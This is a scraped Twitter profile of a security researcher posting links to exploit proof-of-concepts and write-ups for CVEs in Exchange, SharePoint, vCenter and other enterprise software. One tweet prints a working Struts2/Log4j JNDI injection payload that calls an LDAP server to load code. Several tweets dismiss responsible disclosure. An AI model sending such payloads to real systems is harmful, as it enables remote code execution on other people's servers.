Janggggg @testanull Twitter profile

Last Seen Profiles

@JigarAsari10

@avara

@zams1114

@akikekalainen

@kyotoavanti

@ChelseaHainesVT

@bokeplokalmalam

@Borocoxoolatra

@FackingB

@boomtho

@mono_moco

@bokeplokalmalam

@AlessandraBaga6

@bokeplokalmalam

@Desiindianmen1

@bokeplokalmalam

@pdkirwan

@stwmaniax

@claraassaf

@bokeplokalmalam

@TexanTCG

@FeigelWerner

@jandakembangstw

@yu_zuu17

@FackingB

@minami_senryaku

@min___1998

@Vox35112635

@VALDEZNATI0N

@Lori19222938

@soidisan01

@bokeplokalmalam

@OstraZielen

@amteshwar

@bokeplokalmalam

@toiyeumanutd

Janggggg

@testanull

2 years

17

190

1K

Janggggg

@testanull

2 years

CVE-2022-36804 PoC 🧐

12

326

1K

Janggggg

@testanull

2 years

You guys must be waiting for this, So this is the working PoC script of the Exchange 0day exploited ITW

GitHub - testanull/ProxyNotShell-PoC

Contribute to testanull/ProxyNotShell-PoC development by creating an account on GitHub.

github.com

8

242

710

Janggggg

@testanull

3 years

As many ppl requested, Here is the PoC of CVE-2021-42321, Exchange Post-Auth RCE This PoC just pop mspaint.exe on the target, can be use to recognize the signature pattern of a successful attack event

PoC of CVE-2021-42321: pop mspaint.exe on the target

PoC of CVE-2021-42321: pop mspaint.exe on the target - CVE-2021-42321_poc.py

gist.github.com

2

287

683

Janggggg

@testanull

3 years

I just published Microsoft Exchange From Deserialization to Post-Auth RCE (CVE-2021–28482)

Microsoft Exchange From Deserialization to Post-Auth RCE (CVE-2021–28482)

Sau sự kiện proxylogon xảy ra vào tháng 3 vừa rồi, có vẻ như đã tiếp một nguồn cảm hứng mới cho các Researcher đã/đang làm về Exchange.

link.medium.com

6

274

669

Janggggg

@testanull

2 years

Hey look, I've just found a seRioUs vulnerability in Java System.out.println() method Just by executing System.out.println() with a malicious Object with the method toString() is override, our mAlicIous code will get executed remotely ( ͡° ͜ʖ ͡°)

34

93

624

Janggggg

@testanull

4 years

Analysis of CVE-2020-14882 Weblogic RCE via HTTP CVSS 9.8/10 Hope you enjoy it ;) Thanks an anonymous man for supporting!

Weblogic RCE by only one GET request — CVE-2020–14882 Analysis

TL;DR

testbnull.medium.com

9

244

612

Janggggg

@testanull

2 years

Lol The URL pattern to detect/prevent the Exchange 0day provided in MSRC's blog post can easily be bypassed @GossiTheDog

13

154

597

Janggggg

@testanull

3 years

Trying to figure out which line's containing wrong indentation...

29

55

576

Janggggg

@testanull

1 year

6

53

551

Janggggg

@testanull

3 years

3

80

543

Janggggg

@testanull

3 years

Struts2 RCE PoC/IoC: /$%7bjndi:ldap:/$%7blower:/%7d192.168.139.1:1389/o=tomcat%7d$%7blower:/%7d/ Disclaimer: This isn't an 0day, It has already been mentioned as vulnerable in many Chinese blog post *this really reminds me of SpEL injection

Incredible RCE (Struts2 ft Log4j2)

Everyone get RCE

www.youtube.com

3

145

457

Janggggg

@testanull

3 years

As promised, Here is the detail and a part of PoC about the OAM Pre-Auth RCE (CVE-2021-35587) It may require more work to get fully functional PoC, Have fun with it! cc @peterjson

Oracle Access Manager Pre-Auth RCE (CVE-2021–35587 Analysis)

As you may know, Oracle Access Manager (OAM) is a popular SSO product used by many big corp such as Oracle, VMware, Huawei, Qualcomm, …

testbnull.medium.com

10

208

450

Janggggg

@testanull

5 years

I just published The Art of Deserialization Gadget Hunting [part 3] (How I found CVE-2020–2555 by known tools!)

The Art of Deserialization Gadget Hunting [part 3] (How I found CVE-2020–2555 by known tools!)

Every idea needs a Medium

link.medium.com

5

168

436

Janggggg

@testanull

3 years

Just public some notes on CVE-2021-22005 A part of the PoC is also included Happy weekend patching!

Quick note of vCenter RCE (CVE-2021–22005)

Mấy nay đầu óc đang rối ren, bộn bề trong biển việc, ngồi nghĩ mãi mà ko ra cái tên nào hợp lý cho cái blog này cả, không có tên thì lại…

testbnull.medium.com

9

174

438

Janggggg

@testanull

3 years

Just published detailed analysis of Microsoft Exchange Deserialization to RCE (CVE-2021-42321), which's also found exploited in Tianfu Cup. English version from @peterjson PoC is not provided, Have fun!

Some notes about Microsoft Exchange Deserialization RCE (CVE-2021–42321)

Vietnamese version: https://testbnull.medium.com/some-notes-of-microsoft-exchange-deserialization-rce-cve-2021-42321-f6750243cdcd

peterjson.medium.com

4

178

416

Janggggg

@testanull

10 months

MS finally replys to our email and allow us to public more details about the Auth bypass and Code Injection chain in SharePoint, which was used in Pwn2Own Vancouver 2023. Here is the (not-so) fully working PoC for that: Have a nice weekend! ;)

SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC

SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC - SharePwn_public.py

gist.github.com

5

133

408

Janggggg

@testanull

3 years

CVE-2021-35587 Oracle Access Manager Pre-Auth RCE found by me and @peterjson Blog post will be published soon, stay tuned!

4

119

396

Janggggg

@testanull

3 years

Finally got direct shell of CVE-2021-21985 without RMI

8

78

354

Janggggg

@testanull

5 months

2

45

353

Janggggg

@testanull

3 years

CVE-2021–31474 SolarWinds Orion Deserialization PoC

5

102

339

Janggggg

@testanull

3 years

SQL Injection in Wordpress core (CVE-2022–21661)

Giới thiệu

cognn.medium.com

2

98

338

Janggggg

@testanull

3 years

#begbountytips

7

64

332

Janggggg

@testanull

3 years

Just published some details about the CVE-2021–35215, SolarWinds Orion Deserialization to RCE. The second part will come with 3 more bugs of Deserialization in SolarWinds 🤣. #pocfriday

50 Shades of SolarWinds Orion Deserialization (Part 1: CVE-2021–35215)

Cách đây không lâu, mình bắt tay vào phân tích một vài bug deserialize của SolarWinds và cũng đã note lại tại đây

link.medium.com

3

115

312

Janggggg

@testanull

2 years

Successfully reproduced the Gitlab Project Import RCE (CVE-2022-2185) Got headache while reading Ruby for last 2 weeks, but it worth definitely digging in Have good read!

Gitlab Project Import RCE Analysis (CVE-2022-2185)

At the beginning of this month, GitLab released a security patch for versions 14->15. Interestingly in the advisory, there was a mention of a post-auth RCE bug with CVSS 9.9. The bug exists in...

starlabs.sg

3

117

305

Janggggg

@testanull

2 years

Exchange TabShell RCE PoC (CVE-2022-41076) (Just copy paste the poc from @vcslab 's blog post) Still wondering why this vulnerability is so underrated xD PoC script (for copy paste purpose):

Exchange TabShell RCE PoC (CVE-2022-41076)

Copy paste PoC from VCS blog: https://blog.viettelcybersecurity.com/tabshell-owassrf/

www.youtube.com

2

95

307

Janggggg

@testanull

5 years

CVE-2020-7961 direct shell PoC Generator: Payload: Blog post in Vietnamese: Much respect to @codewhitesec and @ mbechler

1

120

291

Janggggg

@testanull

3 years

Just published some analysis on CVE-2021-2400 & CVE-2021-2401, Oracle BI XXE And some case study to get RCE with it Have fun!

Linh tinh về Oracle Business Intelligence [part 1]

Hồi cuối năm ngo��i, sau khi đã farm mòn hết cả cuốc với Weblogic thì team bọn mình quyết định lấy 1 product nữa của Oracle ra mổ xẻ, đó là…

link.medium.com

1

100

284

Janggggg

@testanull

1 year

Oops! So we accidently dropped a 0day

Remote code execution via user-supplied H2 connection strings

# What is the Vulnerability? The core issue is that one of our supported data warehouses (an embedded in-memory database H2), exposes a number of ways for a connection string to include code that ...

github.com

5

61

262

Janggggg

@testanull

3 years

Here is the final part of SolarWinds Orion Deserialization (CVE-2021-35218) This vulnerability can be triggered without any authentication, *It's sad that ZDI didn't accept this as an Pre-Auth RCE Kudo @Y4er_ChaBug for detailed analysis!

50 Shades of SolarWinds Orion (Patch Manager) Deserialization (Final Part: CVE-2021–35218)

Sau bài viết vội về CVE-2021–35215 cuối tuần trước, mình thấy cũng có khá nhiều người đang quan tâm tới các product của SolarWinds.

testbnull.medium.com

2

88

245

Janggggg

@testanull

4 years

It's possible to chain the ProxyLogon with DlpPolicy bug to directly running command in the server Ref:

3

93

242

Janggggg

@testanull

3 years

A Quick Look at CVE-2021–21985 VCenter Pre-Auth RCE, PoC Included. Happy patching ;)

A Quick Look at CVE-2021–21985 VCenter Pre-Auth RCE

Mấy ngày gần đây thặc là những ngày tháng nặng nề đối với mình,

link.medium.com

5

86

241

Janggggg

@testanull

3 months

Here is the PoC for MS SharePoint bugs fixed in this month's patch :) Responsible Disclosure is a joke

Microsoft SharePoint Server 2019 RCE (Fixed in Jul Patch)

PoC by Jang

www.youtube.com

3

75

241

Janggggg

@testanull

1 year

Proper way to handle long if-else statement in IDA 👍

7

21

237

Janggggg

@testanull

3 years

Nice work! Here is another one ...

3

50

228

Janggggg

@testanull

3 years

What If Struts2 uses Log4j2 ...

5

32

210

Janggggg

@testanull

4 years

Analysis of ProxyLogon A perfect combination of CVE-2021-26855 and 27065 Kudo Perfect bugs of 2021! Have fun ;)

Phân tích lỗ hổng ProxyLogon — Mail Exchange RCE (Sự kết hợp hoàn hảo CVE-2021–26855 +…

Tuần đầu tháng 3 vừa rồi có khá nhiều biến động trong giới bảo mật, 4 lỗ hổng 0day của Mail Exchange bị sử dụng trong thực tế để chiếm…

link.medium.com

3

80

213

Janggggg

@testanull

3 years

As usual, Here is the analysis note of recent SolarWinds Deserialization to RCE (CVE-2021–31474)

Phân tích lỗ hổng SolarWinds Orion Deserialization to RCE (CVE-2021–31474)

Sau 2 tháng trời diff patch Exchange thì tới patch của tháng 5 này thì mình đã bị ngộ độc và quá chán nản,

link.medium.com

2

77

210

Janggggg

@testanull

3 years

Still don't know if this is CVE-2021-28482 or CVE-2021-28483 But it's posibble to take down Exchange with a low privilege user

5

55

205

Janggggg

@testanull

7 months

More details about the vulnerability I brought to last p2o (which is not success) Many lessons were learnt from this failure Hope it will help someone who’s working as a system admin or a researcher ?

SharePoint not-so 0day (How I’ve failed at p2o Vancouver 2024)

Cũng đã lâu mình chưa lên bài nào về kỹ thuật, lần gần nhất cũng là về entry SharePoint tại kỳ p2o Vancouver 2023.

testbnull.medium.com

2

49

193

Janggggg

@testanull

3 years

Another approach to get RCE of CVE-2021-22005, Work with most case, doesn't require CEIP to be enabled, "..;/" is not dead CC @wvuuuuuuuuuuuuu ,

vCenter PreAuth RCE (CVE-2021-22005)

PoC by Jang

www.youtube.com

7

38

173

Janggggg

@testanull

3 years

About the CVE-2021-26084, It's a Pre-Auth RCE vulnerability by default, even if the Sign-Up function is disabled. Patch your server before the PoC is released! cc @rootxharsh @iamnoooob @peterjson

3

25

172

Janggggg

@testanull

1 year

Thumbnails for upcoming blog post …

4

32

166

Janggggg

@testanull

5 years

It 's fun to drop a RCE and watch the world burn ;)

2

18

154

Janggggg

@testanull

1 year

Our team @starlabs_sg has successfully reproduced the PreAuth RCE via WAN in ZyWall device :) We can confirm this vulnerability can be exploited via WAN even with the default config of ZyWall device It's still not too late to patch your device, so do it ASAP! GG @TrapaSecurity

5

26

152

Janggggg

@testanull

1 year

Someone has successfully reproduced one of my p2o exploit chain

Phân tích CVE-2023-29357 - Microsoft SharePoint ValidateTokenIssuer Authentication Bypass Vulnera...

Brief CVE description Lỗ hổng CVE-2023-29357 cho phép kẻ tấn công bỏ qua xác thực, leo thang đặc quyền trên các hệ thống sử dụng SharePoint. Lỗ hổng tồn tại bên trong method ValidateTokenIssuer do...

sec.vnpt.vn

2

45

139

Janggggg

@testanull

4 years

I just published an analysis of CVE-2020-7200, HPE SIM AMF Deserialization lead to RCE PoC: Post:

HPE System Insight Manager (SIM) AMF Deserialization lead to RCE(CVE-2020–7200)

Vài ngày vừa rồi, khi lượn lờ trên 1 group bảo mật, mình có đọc được bài báo nói về HPE vừa release bản vá cho 0day nào đó có CVSS 9.8/10.

link.medium.com

1

65

137

Janggggg

@testanull

3 years

Confirmed!

vx-underground

@vxunderground

3 years

A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account. We have not verified the exploit. tl;dr big if true Download the 0day POC here:

30

419

1K

6

31

132

Janggggg

@testanull

3 years

Finally, Chinese speaking win the race

Vcenter Server CVE-2021-21985 RCE PAYLOAD

废话不多讲，老外对补丁的分析，具体补丁的分析和漏洞点可以看这篇文章 https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985 这个漏洞主要是对Spring 管理的bean进行相关的方法对象操作，但是这里不同的是，操作的bean在内存中基本上都是一个对象，这样就可以通过多次方法调用来实现伪链式调用。 Vcenter 开启Debug端口，可以直

iswin.org

2

39

131

Janggggg

@testanull

2 years

Phân tích lỗ hổng SharePoint Webpart Property Traversal (CVE-2022–38053, CVE-2023–21742…

Sau khi kỳ p2o Vancouver 2023 kết thúc, tôi được yêu cầu tiếp tục nghiên cứu một số CVE của SharePoint: CVE-2023–21742 và CVE-2023–21717

testbnull.medium.com

1

45

132

Janggggg

@testanull

2 years

GGWP! Great blog and also very detailed PoC about breaking the Google Nest Hub gen 2 bootloader

3

25

128

Janggggg

@testanull

2 years

Good job MS :)! Left my Exchange lab running for hours with internet and it got patched automatically

5

28

127

Janggggg

@testanull

1 year

It’s happening, someone is using Zyxel PoC to scan the whole internet.

Stephen Fewer

@stephenfewer

1 year

Our @rapid7 AttackerKB analysis detailing CVE-2023-28771 is available. Unauthenticated command injection on the WAN interface of several Zyxel devices. Bug is in the IKE packet decoder for the IPSec VPN service, running by default.

2

36

112

2

30

123

Janggggg

@testanull

3 years

Run Barry, Run! ;):

PoC of CVE-2021-28482

PoC of CVE-2021-28482. GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

0

46

120

Janggggg

@testanull

9 months

Just want to announce that I’m officially a part of @dfsec_com today!

16

2

122

Janggggg

@testanull

3 years

6

12

106

Janggggg

@testanull

2 years

Last week, in the HITB SECCONF, i saw an interesting challenge: linkextractor which have many way to solve, My solution is to abuse the insecure deserialization bug to get RCE It's also the renew of MozillaRhino to work with new JDK! Have a good read! ;)

Return of the Rhino — Analysis of MozillaRhino gadgetchain (also the writeup of HITB linkextractor)

Last week, HITB A&D CTF was held both online & onside.

testbnull.medium.com

1

28

109

Janggggg

@testanull

2 years

Microsoft SharePoint Server Post-Authentication Server-Side Request Forgery vulnerability

Overview Disclaimer: No anime characters or animals were harmed during the research. The bug had been fixed but it did not meet that criterion required to get CVE. Recently, we have found a Server-...

starlabs.sg

2

32

106

Janggggg

@testanull

3 years

Quick confirm that this is the real PoC of CVE-2021-21985 👍

2

31

102

Janggggg

@testanull

3 years

Continue on CVE-2021-26084 There was some tweet telling that block the entrypoint "/pages/createpage-entervariables.action" will reduce the risk. But it's not enough, After rechecking, there're more than 2 entrypoints can be used with the Pre-Auth RCE. RT wisely!

3

21

102

Janggggg

@testanull

7 months

CVE-2024-21426 & CVE-2024-26198 Attacker be like:

0

8

101

Janggggg

@testanull

4 years

PoC of 26855 Have fun ;)

2

34

99

Janggggg

@testanull

3 years

GitHub - XiaoliChan/wmiexec-RegOut: Modify version of impacket wmiexec.py, get output(data,respon...

Modify version of impacket wmiexec.py, get output(data,response) from registry, don't need SMB connection, also bypassing antivirus-software in lateral movement like WMIHACKER. - XiaoliChan...

github.com

1

32

95

Janggggg

@testanull

1 year

It was not until 2 hours before deadline, Samsung has patched the first bug. Luckily, the bypass one was found 15 minutes later, As always, Vietnamese version is also available here: Happy reading!

starlabs

@starlabs_sg

1 year

The Old, The New and The Bypass - One-click/Open-redirect to own Samsung S22 at Pwn2Own 2022 written by @testanull Thanks to @thezdi for reviewing and inputs to the blog post. Greatly appreciate that.

0

60

179

0

17

95

Janggggg

@testanull

2 years

*me

1

3

93

Janggggg

@testanull

3 years

Beside the active exploitation of CVE-2021-35464, Here is another view of the Pre-Auth RCE in ForgeRock AM =>

Phân tích lỗ hổng Pre-Auth RCE trên ForgeRock AM (CVE-2021–35464)

Những ngày tháng yên ả của tháng 5 và tháng 6, twitter không có gì nổi bật lắm ngoài những vụ drama về Ransomware, supply chain này nọ …

link.medium.com

1

30

91

Janggggg

@testanull

3 years

Guess what products 🤔

3

11

90

Janggggg

@testanull

2 years

10 steps to quickly gain followers on twitter Step 1: Threatening to public a 0day ... Congratz! You are now being followed by many Threat Intelligence bot/user.

2

4

83

Janggggg

@testanull

1 year

1

16

81

Janggggg

@testanull

4 years

Got 2nd place in recent @GHSecurityLab CodeQL CTF Here is my writeup: Thanks @pwntester , @XCorail and @GHSecurityLab for a great CTF chall

0

21

80

Janggggg

@testanull

3 years

@cyb3rops Verified with the relevant case of VCenter To use with VCenter, you may want to change the path into "/storage/log/vmware/"

0

23

78

Janggggg

@testanull

2 years

1

19

78

Janggggg

@testanull

5 months

1

6

76

Janggggg

@testanull

2 years

It's fire ...

4

6

77

Janggggg

@testanull

4 months

As someone said: Responsible Disclosure is killing the 0day industry :)

1

7

76

Janggggg

@testanull

3 years

I can see that many people have completed the PoC, So this's my full version of the vCenter RCE, Have fun with it ;)!

asdklajsdlkajsdlkajsdakjsdhalskdasdioasiodaklsd.py

GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

1

22

75

Janggggg

@testanull

1 year

*me these days

Janggggg

@testanull

2 years

17

190

1K

3

8

70

Janggggg

@testanull

2 years

@cyb3rops You’re not the only one who read it, just skip it when you find it’s not useful for your work. Our work is not about writing the indicators of the exploit, it’s yours :)

2

5

72

Janggggg

@testanull

4 years

2

16

70

Janggggg

@testanull

3 years

It's time to extend the sink of gadgetinspector

4

3

66

Janggggg

@testanull

4 years

Cause the vendor seem doesn't care much about this, So I decided to uncensor and publish every thing about the 0day also found by @pedrib1337 Payload Generator: The blog post:

(0.5 day) Micro Focus Operations Bridge Manager Pre-Auth Deserialization to RCE

Mấy ngày nay mình có lượn lờ quanh các trang mạng để tìm kiếm nguồn cảm hứng mới cho công việc, hết twitter, reddit, ròi tới facebook …

testbnull.medium.com

0

34

62

Janggggg

@testanull

2 years

There's nothing new here, it's just a translated version of the original Chinese blog post, It would be easier for Google Translate to translate from VNese to English xD

Some notes about Xalan-J Integer Truncation (CVE-2022–34169)

Tôi và anh em đã để ý tới bug này kể từ khi nó xuất hiện trên mailing list của Apache, tuy nhiên vào thời điểm đó (20/07), chưa có quá…

testbnull.medium.com

1

8

63

Janggggg

@testanull

2 years

*my colleague: Why do they put shellcode in your name xD

1

3

62

Janggggg

@testanull

1 year

PoC for the Inductive Automation Ignition Client RCE 0day

bandicam 2022 12 21 09 41 03 767

null

www.youtube.com

2

8

59

Janggggg

@testanull

1 year

Also check out the Vietnamese version ;)

[P2o Vancouver 2023] Vài dòng về SharePoint Pre-Auth RCE chain (CVE-2023–29357 & CVE-2023–24955)

Mình bắt đầu làm SharePoint ngay từ những ngày đầu join StarLabs — 04/2022. Bug đầu tiên mình tìm thấy ngay sau 2 ngày đọc code của…

testbnull.medium.com

starlabs

@starlabs_sg

1 year

Are you ready for a deep dive into MS Sharepoint? Our team member, @testanull ,is sharing with everyone his latest blog post. [P2O Vancouver 2023] SharePoint Pre-Auth RCE chain (CVE-2023–29357 & CVE-2023–24955) We hope that everyone enjoyed reading it

2

117

266

4

13

58

Janggggg

@testanull

3 years

1

3

58

Janggggg

@testanull

2 years

0

1

56

Janggggg

@testanull

1 year

Retweet due to so many people asked for the gadgetchain of CVE-2021-35587 in OAM 10g, The step to reproduce it has already been provided in section "Universal gadget chain for 10.3.x" Detail:

0

13

54

Janggggg

@testanull

4 years

@pwntester

2

6

53

Janggggg

@testanull

3 years

Here come the T24 ft Log4j2

0

13

52

Janggggg

@testanull

5 years

So today I decided to disclosed my LPE report in @Semmle 2 weeks ago

Semmle disclosed on HackerOne: Privilege escalation in workers...

## Summary about the bugs: In the prepare step, semmle allows user to install new package. By upload a malicious package along with source code and force server to build this package, attacker...

hackerone.com

1

13

51

Janggggg

@testanull

3 months

I don’t really care much about the credit story, but this guy is trying to clone my blog post and claim all of credits in the org post. I have no idea about their purpose but be careful while working with them

3

5

52

Janggggg

@testanull

8 months

A Technical Deep Dive: Comparing Anti-Cheat Bypass and EDR Bypass | White Knight Labs

In the evolving landscape of digital security, two prominent challenges emerge that pose significant threats to the integrity of online systems and user data:

whiteknightlabs.com

0

6

52

Janggggg

@testanull

3 years

Look like someone is trying to mitigate the Log4j

1

3

47

Janggggg

@testanull

1 year

shubs

@infosec_au

1 year

For the first 3-4 years that i was working in infosec, I found client side security so exciting. I stayed on top of every new technique and studied new techniques closely. After this, I took a step back and realised that all of my work on client side security felt helpless,

24

54

512

4

8

49

Janggggg

@testanull

1 year

So true

LiveOverflow 🔴

@LiveOverflow

1 year

Web Security vs. Binary Exploitation

107

2K

11K

1

4

48

Janggggg

@testanull

1 year

0

2

47

Janggggg

@testanull

1 year

Fact: Metabase doesn't release the fixed code in their "oPen-SouRce" repository So basically, If you're naively using their open-source version, you're still vulnerable!

1

5

45

Janggggg

@testanull

4 years

A few words about the CVE-2020-4280 - IBM QRadar Java Deserialization and the patch of it

1

15

46

Janggggg

@testanull

3 months

Wtf??? It has been more than 6 months and they still don’t have any action on my reported bug wE treAt sEcUriTy seRioUsly What a joke

Zero Day Initiative

@thezdi

3 months

It's Patch Tuesday once more. While #Adobe had a tiny release, #Microsoft had one of their biggest months ever - including two 0-days under active attack. Join @dustin_childs as he breaks down all the details.

2

24

64

1

2

46